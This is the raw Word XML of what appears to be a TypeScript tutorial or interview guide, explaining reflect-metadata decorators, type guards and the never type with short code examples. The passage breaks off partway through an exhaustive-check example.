        <w:t>Install the reflect-metadata library:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E70FA5" w14:textId="77777777" w:rsidR="003F7A48" w:rsidRPr="00DA2F32" w:rsidRDefault="003F7A48"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npm install reflect-metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6350104B" w14:textId="77777777" w:rsidR="003F7A48" w:rsidRPr="00DA2F32" w:rsidRDefault="003F7A48" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="295"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Import and configure reflect-metadata in your project:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BD6741" w14:textId="77777777" w:rsidR="003F7A48" w:rsidRPr="00DA2F32" w:rsidRDefault="003F7A48"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import 'reflect-metadata';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2F27D8" w14:textId="77777777" w:rsidR="003F7A48" w:rsidRPr="00DA2F32" w:rsidRDefault="003F7A48" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="295"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use metadata reflection in decorators:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5F3D0C" w14:textId="77777777" w:rsidR="003F7A48" w:rsidRPr="00DA2F32" w:rsidRDefault="003F7A48"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import 'reflect-metadata';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B5C888" w14:textId="77777777" w:rsidR="003F7A48" w:rsidRPr="00DA2F32" w:rsidRDefault="003F7A48" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62DAD4B5"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Inject(target: any, propertyKey: string) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001F12A7"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type = Reflect.getMetadata('design:type', target, propertyKey);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431B3D8D"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console.log(`Property ${propertyKey} has type ${type.name}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07151C80"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FF306EF"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95DCDA6"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Service {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA73670"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@Inject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE05E6C" w14:textId="77777777" w:rsidR="003F7A48"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public dependency!: any;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD90F80" w14:textId="137A5AC8" w:rsidR="0002063F" w:rsidRPr="00DA2F32" w:rsidRDefault="003F7A4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E16FBB8" w14:textId="313479EB" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="106" w:name="_Toc178383289"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explain the concept of type guards in TypeScript</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
    </w:p>
    <w:p w14:paraId="2270BED5"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Type guards in TypeScript are mechanisms that help you narrow down the type of a variable within a specific scope. They allow you to write code that is both type-safe and expressive by providing TypeScript with information about the type of a value. Type guards are crucial for handling union types and ensuring that you only perform operations that are valid for a specific type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A55C7C5"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Here’s a detailed guide on how to use type guards effectively:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DDBAF7" w14:textId="77777777" w:rsidR="0076353D" w:rsidRPr="00DA2F32" w:rsidRDefault="0076353D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1. Type Guards Using typeof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005A6CE0"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>You can use the typeof operator to narrow down the type of a variable to primitive types such as string, number, boolean, and symbol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280F8A5E"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4BD6C0C7"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formatValue(value: string | number) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AE798C"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(typeof value === 'string') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2879AEE0"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value.toUpperCase(); // Safe to use string methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3697FF"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if (typeof value === 'number') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C71FC8F"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value.toFixed(2); // Safe to use number methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF2DB81"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EDBD0BC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E39338"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293736E"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DC0239E"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console.log(formatValue('hello')); // HELLO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F234A60"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console.log(formatValue(123.456)); // 123.46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E926E1" w14:textId="77777777" w:rsidR="0076353D" w:rsidRPr="00DA2F32" w:rsidRDefault="0076353D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2. Type Guards Using instanceof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7685760E"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The instanceof operator is used to check if an object is an instance of a particular class or constructor function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790EDBA3"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4A37F8E0"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Dog {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60539366"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bark() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014A8AB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console.log('Woof!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B88671"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90A6F78"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06352CF"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D6C82FA"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Cat {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E97800"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meow() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AD8745"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console.log('Meow!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2B31CB"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D21F66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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF706CB"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1CC5BC2"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makeSound(animal: Dog | Cat) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E8FC4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(animal instanceof Dog) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4023826B"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animal.bark(); // Safe to call Dog-specific methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4F0D20"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if (animal instanceof Cat) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB75EB0"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animal.meow(); // Safe to call Cat-specific methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B86C84"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B27D0FC"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188FC8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F4CD4F5"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dog = new Dog();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519295E4"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cat = new Cat();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8D3254"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6D0ACEF"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makeSound(dog); // Woof!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8746BB"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makeSound(cat); // Meow!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B16214" w14:textId="77777777" w:rsidR="0076353D" w:rsidRPr="00DA2F32" w:rsidRDefault="0076353D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3. Type Guards Using in Operator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0C73B4"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The in operator checks if a property exists on an object. This can be useful for narrowing down types in union types where different types have different properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBFA371"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0544935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Car {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D57AB3"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drive(): void;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D0F5CD"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honk: string;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65728BF7"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6708268"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547BD66"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Bicycle {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C39E85E"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pedal(): void;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149430B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41DE321"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99F2C1F"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move(vehicle: Car | Bicycle) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6C97DF"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('drive' in vehicle) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430B3475"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vehicle.drive(); // Safe to call Car-specific methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE83C4E"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2B5E40F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vehicle.pedal(); // Safe to call Bicycle-specific methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EF529E"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D416026"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0126918"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D56AF03"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car: Car = { drive: () =&gt; console.log('Driving'), honk: 'beep' };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4184D224"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bicycle: Bicycle = { pedal: () =&gt; console.log('Pedaling') };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7E96EE"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670F8DC"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move(car); // Driving</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4707E5F0"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move(bicycle); // Pedaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150D161C" w14:textId="77777777" w:rsidR="0076353D" w:rsidRPr="00DA2F32" w:rsidRDefault="0076353D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4. User-Defined Type Guards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3215F58F"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>User-defined type guards are functions that return a type predicate, allowing you to create custom type checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7A2A12"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5AB4046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isDog(animal: Dog | Cat): animal is Dog {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471A1453"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(animal as Dog).bark !== undefined;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8A885F"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39E84A5"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3538980"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makeSound(animal: Dog | Cat) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CEF25B"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(isDog(animal)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C345465"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animal.bark(); // Safe to call Dog-specific methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E96572C"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089AFA78"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animal.meow(); // Safe to call Cat-specific methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C878C02"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7130E55"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119920A"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D048E8D"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dog = new Dog();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DDC06B"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cat = new Cat();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002B92D4"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2AC8D35"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makeSound(dog); // Woof!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B1FAF4"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makeSound(cat); // Meow!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F53C8E" w14:textId="77777777" w:rsidR="0076353D" w:rsidRPr="00DA2F32" w:rsidRDefault="0076353D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5. Type Guards with Type Predicates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1920EC3B"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Type predicates help TypeScript understand the type of a variable after a type guard check.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F134257"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15CF89C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isString(value: string | number): value is string {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E5A06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typeof value === 'string';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6547C56B"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D6D7B95"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C2AB136"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printLength(value: string | number) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDD334B"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(isString(value)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D059372"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console.log(value.length); // Safe to access 'length' property</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F65607"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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4F2DAC"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console.log(value.toFixed(2)); // Safe to use 'toFixed' method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A98053E"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50DC244"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BE25AA7"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5BCC276"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printLength('hello'); // 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257D0435"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printLength(123.456); // 123.46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481728D7" w14:textId="77777777" w:rsidR="0076353D" w:rsidRPr="00DA2F32" w:rsidRDefault="0076353D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6. asserts Keyword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8693CD"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The asserts keyword in a user-defined type guard function can be used to assert that a value is of a specific type, providing additional type narrowing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E0F531" w14:textId="77777777" w:rsidR="0076353D" w:rsidRPr="00DA2F32" w:rsidRDefault="0076353D"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28E35F03"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assertIsString(value: string | number): asserts value is string {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C0C3B7"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(typeof value !== 'string') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F212437"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throw new Error('Value is not a string');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7577188F"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4F62A32"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2BDB0EF"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2398289"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printStringLength(value: string | number) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5351A712"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assertIsString(value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E834D8E"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console.log(value.length); // Safe to access 'length' property</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E432FA2"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28714D2"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3369441"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printStringLength('hello'); // 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE264E4" w14:textId="77777777" w:rsidR="0076353D" w:rsidRPr="00DA2F32" w:rsidRDefault="0076353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printStringLength(123.456); // Error: Value is not a string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C7C343" w14:textId="77777777" w:rsidR="0002063F" w:rsidRPr="00DA2F32" w:rsidRDefault="0002063F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2909AE5A" w14:textId="4A9AA872" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_Toc178383290"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is the never type in TypeScript</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
    </w:p>
    <w:p w14:paraId="3212F138" w14:textId="77777777" w:rsidR="00ED56BE" w:rsidRPr="00DA2F32" w:rsidRDefault="00ED56BE" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In TypeScript, the never type represents a value that never occurs. It is used to denote scenarios where a function or expression will never return a value, either because it throws an error or because it has an infinite loop. The never type is often used for error handling and exhaustive checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBCC424" w14:textId="77777777" w:rsidR="00ED56BE" w:rsidRPr="00DA2F32" w:rsidRDefault="00ED56BE" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Uses of never Type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BD67E7" w14:textId="77777777" w:rsidR="00ED56BE" w:rsidRPr="00DA2F32" w:rsidRDefault="00ED56BE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="296"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Functions That Never Return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0447E60F" w14:textId="77777777" w:rsidR="00ED56BE" w:rsidRPr="00DA2F32" w:rsidRDefault="00ED56BE" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A function that never completes its execution can be defined to return never. This includes functions that throw exceptions or enter an infinite loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55517875" w14:textId="77777777" w:rsidR="00ED56BE" w:rsidRPr="00DA2F32" w:rsidRDefault="00ED56BE"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18258152"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throwError(message: string): never {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DEDA7D"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throw new Error(message); // This function will never return a value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D70D3FE"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C815E03"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A006F68"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infiniteLoop(): never {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBECC37"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while (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAD0EE1"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This function will never exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6920B0B7"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6285ABD"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52DBA9B" w14:textId="77777777" w:rsidR="00ED56BE" w:rsidRPr="00DA2F32" w:rsidRDefault="00ED56BE" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In the example above:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765CC41E" w14:textId="77777777" w:rsidR="00ED56BE" w:rsidRPr="00DA2F32" w:rsidRDefault="00ED56BE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="297"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>throwError throws an error, which means it will never complete normally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDC9DD2" w14:textId="77777777" w:rsidR="00ED56BE" w:rsidRPr="00DA2F32" w:rsidRDefault="00ED56BE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="297"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>infiniteLoop runs indefinitely and never finishes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9F62EC" w14:textId="77777777" w:rsidR="00ED56BE" w:rsidRPr="00DA2F32" w:rsidRDefault="00ED56BE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="298"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Exhaustive Checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A2C536" w14:textId="77777777" w:rsidR="00ED56BE" w:rsidRPr="00DA2F32" w:rsidRDefault="00ED56BE" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The never type is useful in exhaustive checks to ensure that all possible cases are handled in a switch statement or other control structures. If there are any cases not handled, TypeScript will produce an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC8BCD3"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type Shape = Circle | Square;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F00CE88"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D00161E"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Circle {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275D4727"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kind: "circle";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407F7D3B"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radius: number;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F42702"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2896B1E"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CDF2D3F"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interface Square {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D7B16F"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kind: "square";</w:t>
      </w:r>
    </w:p>
